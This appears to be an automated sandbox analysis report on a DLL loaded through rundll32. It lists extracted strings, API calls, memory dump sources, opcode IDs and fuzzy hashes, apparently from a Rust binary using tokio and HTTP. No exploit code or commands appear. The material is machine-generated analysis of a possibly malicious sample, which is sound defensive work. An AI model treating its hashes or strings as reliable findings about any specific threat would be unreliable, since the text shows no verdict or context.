                              • {invalid syntax}{recursion limit reached}?'for<> ::{closureshim# as mut const ; dyn + unsafe extern ", xrefs: 6CC43E6D
                              • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6CC458EA
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC4620A
                              • ,(><&*@, xrefs: 6CC45F79, 6CC46183
                              • SizeLimitExhausted, xrefs: 6CC462EB
                              • .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs, xrefs: 6CC44DAD
                              • .%2e%2E, xrefs: 6CC45C5E, 6CC46134
                              • __ZN, xrefs: 6CC451F5
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,(><&*@$.%2e%2E$.llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Result::unwrap()` on an `Err` value${invalid syntax}{recursion limit reached}?'for<> ::{closureshim# as mut const ; dyn + unsafe extern "
                              • API String ID: 0-3150708015
                              • Opcode ID: 15d19370c072ee85e9d3a94b7e6a5359ef12bc896c1aa73cee99171af5e5313e
                              • Instruction ID: 5fb668383d7973513920bbab53263338cb261c870045008c888c5489311994b1
                              • Opcode Fuzzy Hash: 15d19370c072ee85e9d3a94b7e6a5359ef12bc896c1aa73cee99171af5e5313e
                              • Instruction Fuzzy Hash: EC02D275E056158FDB14CF99C4807ADB7B1BF89314F2CC269D869ABB81E331AC42CB91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: swprintf$_memset
                              • String ID: :$@
                              • API String ID: 1292703666-1367939426
                              • Opcode ID: 26546824efc929cea88a5a0cbe0ce2705dc845ce85ea236ce426ff3fea3cd6f8
                              • Instruction ID: c1ace1bf4917af14e60facaed9055c0548041db24b6bf20cea9cfdc883f22333
                              • Opcode Fuzzy Hash: 26546824efc929cea88a5a0cbe0ce2705dc845ce85ea236ce426ff3fea3cd6f8
                              • Instruction Fuzzy Hash: 93313CB6D0021CABEB04CBE8CC95FEEB7B9FB88304F50421DE906A7240E6706945CB94
                              Strings
                              • pool is disabledBadScheme, xrefs: 6CC034FB
                              • request has been canceled, xrefs: 6CC02D85
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC038B6
                              • assertion failed: Pin::new(&mut rx).poll(cx).is_pending(), xrefs: 6CC038DC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: assertion failed: Pin::new(&mut rx).poll(cx).is_pending()$called `Result::unwrap()` on an `Err` value$pool is disabledBadScheme$request has been canceled
                              • API String ID: 0-3394898113
                              • Opcode ID: e5f21d1acd1a833b1cb1d74d3ad0d9ffc4f7df7e3be1cd0618ab2d0d24d0706b
                              • Instruction ID: e3a234ae9323c9b7ac9cdb367121528fb5b4ddafc94d58666167cedb6259df91
                              • Opcode Fuzzy Hash: e5f21d1acd1a833b1cb1d74d3ad0d9ffc4f7df7e3be1cd0618ab2d0d24d0706b
                              • Instruction Fuzzy Hash: 98724D35A09B818FC721CF29C480A9BF7F1BFCA344F148A5DE8895B651EB719985CB42
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$__aulldiv
                              • String ID:
                              • API String ID: 3540790784-0
                              • Opcode ID: fb4fb7b8f6ae6604e73de285de927d9d7cb11869837114320e07f3c3780b15ef
                              • Instruction ID: 801b72f5fa97dcaa7dc2b63dda965dcc9f9a49f63c7f684f6ddbf126ef3b9257
                              • Opcode Fuzzy Hash: fb4fb7b8f6ae6604e73de285de927d9d7cb11869837114320e07f3c3780b15ef
                              • Instruction Fuzzy Hash: 6F32AD326083559FC714CF58C880A5EB7E2EFC9754F198A2DE8999B391E771EC05CB82
                              APIs
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,6CC4859F,?,00001000,?,?,6CC48025,?,6CC4859F,?,?), ref: 6CC487F9
                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000,?,6CC4859F), ref: 6CC48829
                              • WriteConsoleW.KERNEL32(?,?,00000001,6CC4859F,00000000,?,6CC4859F), ref: 6CC4887A
                              • GetLastError.KERNEL32(?,6CC4859F), ref: 6CC48AA3
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                              • String ID:
                              • API String ID: 3036337926-0
                              • Opcode ID: db323ecd82f27da4e537c380d7bc3afbf127da98c060fcd8598f2f43ac221114
                              • Instruction ID: ddd3b9c541167bbea0f895f201855ec07c32f1514ad79e8763b6193def1d8efe
                              • Opcode Fuzzy Hash: db323ecd82f27da4e537c380d7bc3afbf127da98c060fcd8598f2f43ac221114
                              • Instruction Fuzzy Hash: E8A13930A24B915EE7028B3AC441B76B7B4BFD2348F14C72AF9C4B3D81FB7195858285
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: \u$\u${${$}$}
                              • API String ID: 0-582841131
                              • Opcode ID: 3846177a69292b2e2f262e23b0c518f0eb7641cd153b4d63e2ecac50257bd956
                              • Instruction ID: 77fe802c8db79a9e611642844f0651a8daea12b7ce6b5a00d955602af7541e64
                              • Opcode Fuzzy Hash: 3846177a69292b2e2f262e23b0c518f0eb7641cd153b4d63e2ecac50257bd956
                              • Instruction Fuzzy Hash: B551D823E0DBDA86C7018BA944102DEBFF29FE6214F1D81DAC4D81F782C3765685D3A6
                              APIs
                                • Part of subcall function 6CC39B05: memset.VCRUNTIME140(00000000,00000000,?,?,?,?,6CC3985C), ref: 6CC39B28
                              • DecryptMessage.SECUR32(?,?,00000000,00000000), ref: 6CC39955
                                • Part of subcall function 6CBE885A: memmove.VCRUNTIME140(?,?,?,?,?,?,6CBEC2F6,?,?,6CC3460C,?,6CC3463F), ref: 6CBE8883
                                • Part of subcall function 6CC46438: memmove.VCRUNTIME140(?,HTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: ,?,?,00000002,?,?,?,6CC250BB,00000019), ref: 6CC464C5
                              Strings
                              • assertion failed: pos <= self.dec_in.get_ref().len() as u64, xrefs: 6CC39AF6
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$DecryptMessagememset
                              • String ID: assertion failed: pos <= self.dec_in.get_ref().len() as u64
                              • API String ID: 522839164-2093299206
                              • Opcode ID: cf81bec3205ead41921637b9c751b7692368adc342a828d35acd5a1a43da8aae
                              • Instruction ID: 2f84faf657ea1b1fdf400d309ec714c7af34fbeb65d1163fcc170757f4599b72
                              • Opcode Fuzzy Hash: cf81bec3205ead41921637b9c751b7692368adc342a828d35acd5a1a43da8aae
                              • Instruction Fuzzy Hash: 52918C716087109FD310DF2AE580B5BB7E1FF89318F109A2DE59987B50EB71E889CB52
                              APIs
                              • memmove.VCRUNTIME140(?,00000000,00000094), ref: 6CBEEF43
                              • memmove.VCRUNTIME140(?,?,00000094), ref: 6CBEEF6A
                              Strings
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBF02B6
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                              • API String ID: 2162964266-2861346101
                              • Opcode ID: dabf73215a7be6f32db765698064d4ac85bb17ce3e9c0cdadb6fff7e7fd05783
                              • Instruction ID: de10a25a16272a507eb4004824085150bbf82509d0add75d2b09e7cc8cd38d4d
                              • Opcode Fuzzy Hash: dabf73215a7be6f32db765698064d4ac85bb17ce3e9c0cdadb6fff7e7fd05783
                              • Instruction Fuzzy Hash: CF825A75A093818FD324CF18D480BDEB7E1EFD9754F148A2DE89897790D770A989CB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: Xinvalid_argumentstd::_swprintf
                              • String ID:
                              • API String ID: 2109912724-0
                              • Opcode ID: 04b2acf99b33ccf9c52ea25fa5a2854a04adf054afa153323b5f5cccbd1f206d
                              • Instruction ID: d0d18eb6a51cd8a820373adc49ada9be7aa4133a817f3e5cd526af2eb1c8ab78
                              • Opcode Fuzzy Hash: 04b2acf99b33ccf9c52ea25fa5a2854a04adf054afa153323b5f5cccbd1f206d
                              • Instruction Fuzzy Hash: 71E15171A001259FDF64DE64DC80BEEB3B5EB99304F1446ADD94AA7384E731BE818F90
                              APIs
                              • __aulldiv.LIBCMT ref: 6CBF257B
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CBF2890
                              • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000), ref: 6CBF28F4
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$__aulldiv
                              • String ID:
                              • API String ID: 3540790784-0
                              • Opcode ID: 7627c91e58819b67982dd5d2bce57a86b3645372a4bfc80c829d7e4dbbb58a9a
                              • Instruction ID: e11a1fd9fcee75d12d289f75de1efa95e8094e9ac7de2839809754f58f1871d7
                              • Opcode Fuzzy Hash: 7627c91e58819b67982dd5d2bce57a86b3645372a4bfc80c829d7e4dbbb58a9a
                              • Instruction Fuzzy Hash: F9D1E2316083859FD725CF28C89469EB7E2EFC9314F15892DE49997760DB30EC4A8B83
                              Strings
                              • mut const ; dyn + unsafe extern ", xrefs: 6CC24788
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC24EF7
                              • :, xrefs: 6CC24BCA
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: mut const ; dyn + unsafe extern "$:$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                              • API String ID: 2162964266-1873620769
                              • Opcode ID: a5652424d474f181f358c2c39fcda87c4ced11331d53b2e0b209c36bddfc470c
                              • Instruction ID: d5e9d8a3cfb78fe158270952687e146c62d1b0c8c88658200d283d230d898703
                              • Opcode Fuzzy Hash: a5652424d474f181f358c2c39fcda87c4ced11331d53b2e0b209c36bddfc470c
                              • Instruction Fuzzy Hash: 91329F716083419FC714CF29C490B6ABBE2BFC8354F15891DE8999B751EB74EC46CB82
                              APIs
                                • Part of subcall function 6CC39B05: memset.VCRUNTIME140(00000000,00000000,?,?,?,?,6CC3985C), ref: 6CC39B28
                              • DecryptMessage.SECUR32(?,?,00000000,00000000), ref: 6CC10450
                                • Part of subcall function 6CBE885A: memmove.VCRUNTIME140(?,?,?,?,?,?,6CBEC2F6,?,?,6CC3460C,?,6CC3463F), ref: 6CBE8883
                                • Part of subcall function 6CC46438: memmove.VCRUNTIME140(?,HTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: ,?,?,00000002,?,?,?,6CC250BB,00000019), ref: 6CC464C5
                              Strings
                              • assertion failed: pos <= self.dec_in.get_ref().len() as u64, xrefs: 6CC1063E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$DecryptMessagememset
                              • String ID: assertion failed: pos <= self.dec_in.get_ref().len() as u64
                              • API String ID: 522839164-2093299206
                              • Opcode ID: 332aa5b06539ad058e3c3498ec514a7f3fba59982142945d078eca46dee2ea26
                              • Instruction ID: 08851b59e6a6b3f38634723400f96058008038f140d7a3efac05c515bd607627
                              • Opcode Fuzzy Hash: 332aa5b06539ad058e3c3498ec514a7f3fba59982142945d078eca46dee2ea26
                              • Instruction Fuzzy Hash: F191A030708745DFD704DF26C480B9AF7E1BF88318F108A2DE59997B40EB75A898DB96
                              APIs
                              • __aulldiv.LIBCMT ref: 6CBF6856
                                • Part of subcall function 6CC4FDD0: QueryPerformanceCounter.KERNEL32 ref: 6CC4FE15
                                • Part of subcall function 6CC4FDD0: QueryPerformanceFrequency.KERNEL32 ref: 6CC4FE5C
                                • Part of subcall function 6CC4FDD0: __aulldiv.LIBCMT ref: 6CC4FE97
                                • Part of subcall function 6CC4FDD0: __aulldiv.LIBCMT ref: 6CC4FEF2
                                • Part of subcall function 6CC4FDD0: __aulldiv.LIBCMT ref: 6CC4FF07
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: __aulldiv$PerformanceQuery$CounterFrequency
                              • String ID:
                              • API String ID: 2403592835-0
                              • Opcode ID: 76103bf25aeb606303f27c612dc226ebb9b35b930fdea886f526abffd76bda27
                              • Instruction ID: 5a0792c4881d5a86333e51e41d7817a7b25f99eef9c6b7d977be74ef72a99aec
                              • Opcode Fuzzy Hash: 76103bf25aeb606303f27c612dc226ebb9b35b930fdea886f526abffd76bda27
                              • Instruction Fuzzy Hash: 5E127B716083419FC704CF28C490A5AB7F1FF89358F19896DE8A9DB751D731E94ACB82
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC06C9D, 6CC06CDD
                              • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CC06C71
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: Map must not be polled after it returned `Poll::Ready`$called `Result::unwrap()` on an `Err` value
                              • API String ID: 0-3366255769
                              • Opcode ID: 245e56800fb440febce81f0068927eed9b278193209074d623ef697a856a95ae
                              • Instruction ID: edee76afec31fd6ad558f4cd5558fc6ecefd5fa71df0c297ad538d4186f18b7a
                              • Opcode Fuzzy Hash: 245e56800fb440febce81f0068927eed9b278193209074d623ef697a856a95ae
                              • Instruction Fuzzy Hash: 1C626D75A08B818FC725CF24C49069EF7F1BFC9314F148A5DE8899B751EB709989CB42
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CancelErrorFileStatus
                              • String ID:
                              • API String ID: 1267829034-0
                              • Opcode ID: d87c28d415e18c3cd33d71e4830764521cb30a4b8c0e4ee15ccb7527e1d92243
                              • Instruction ID: 3379aeba699379751d951222397d59c1078e7fc449ec644001e430c0ea39a1ff
                              • Opcode Fuzzy Hash: d87c28d415e18c3cd33d71e4830764521cb30a4b8c0e4ee15ccb7527e1d92243
                              • Instruction Fuzzy Hash: 542184B1804742AFEB148F15D408756FBB4FF40319F28C99EE0598BB42D3B5D58ACB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CC62D3B
                              • memset.VCRUNTIME140(?,000000FF,-00000010), ref: 6CC62F10
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmovememset
                              • String ID:
                              • API String ID: 1288253900-0
                              • Opcode ID: dd386c8f62c454d8b82373341f9de689444e6fa721b59882a5b6cd004f753fff
                              • Instruction ID: a3ea441de7ade7e3990fd7306f1176945e0c7add4ca205000a40feabe59abe32
                              • Opcode Fuzzy Hash: dd386c8f62c454d8b82373341f9de689444e6fa721b59882a5b6cd004f753fff
                              • Instruction Fuzzy Hash: BEC1CE356087428BC715CF29C99046AF7E1FFC9314F148A6EE8E597751EB30E946CB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CC62947
                              • memset.VCRUNTIME140(000000FF,000000FF,-00000010), ref: 6CC629D0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmovememset
                              • String ID:
                              • API String ID: 1288253900-0
                              • Opcode ID: d5aba16d235ed406635b61a116f082f8234feeb0e906658cb57c7a77b4bf6f23
                              • Instruction ID: cc48907815b195db928ef10b94df5d7f412d00604c50225208a951fd015ab1fb
                              • Opcode Fuzzy Hash: d5aba16d235ed406635b61a116f082f8234feeb0e906658cb57c7a77b4bf6f23
                              • Instruction Fuzzy Hash: F5B1D0716087418BD715CF2DC59452EFBE2FFC9214F248A2DE89997B51E730E845CB82
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: l$ntdl
                              • API String ID: 0-924918826
                              • Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                              • Instruction ID: 9e2e5841ff3f1dd149a4d9da30bffb154edf212a670e2276cff3409ca97caee0
                              • Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                              • Instruction Fuzzy Hash: 7521DF75A045209F9B29DF14849862FBBA6EF4571471180ADE8079F354FB34E9028BD5
                              Strings
                              • keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: , xrefs: 6CC24048
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state:
                              • API String ID: 0-2895536077
                              • Opcode ID: c1821cc5eaf18b6d2eae17ac0755078687efb9f8eac15485c6737de95bfca350
                              • Instruction ID: 7971b693aa4beb2653e92b9a566eebc9461cfe6fee7acd6b52a7a60bff13b61e
                              • Opcode Fuzzy Hash: c1821cc5eaf18b6d2eae17ac0755078687efb9f8eac15485c6737de95bfca350
                              • Instruction Fuzzy Hash: B242C0715087818FD710CF25C09079AFBF1BF89359F148A5DE8899B792D778E889CB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000094), ref: 6CBF0CE7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 5ac2172b942ce0c1242f3431ee7e73af95f48dcf95fc415f209a9a6a8ddd5bf8
                              • Instruction ID: 4d1b7991071e00e614be163aebaa425efd7f999f1d4491608e7e5829894597a4
                              • Opcode Fuzzy Hash: 5ac2172b942ce0c1242f3431ee7e73af95f48dcf95fc415f209a9a6a8ddd5bf8
                              • Instruction Fuzzy Hash: 7C323975A083828FD324CF25D19079AF7E1FFC9354F148A2DE4A997B51D770A84ACB82
                              APIs
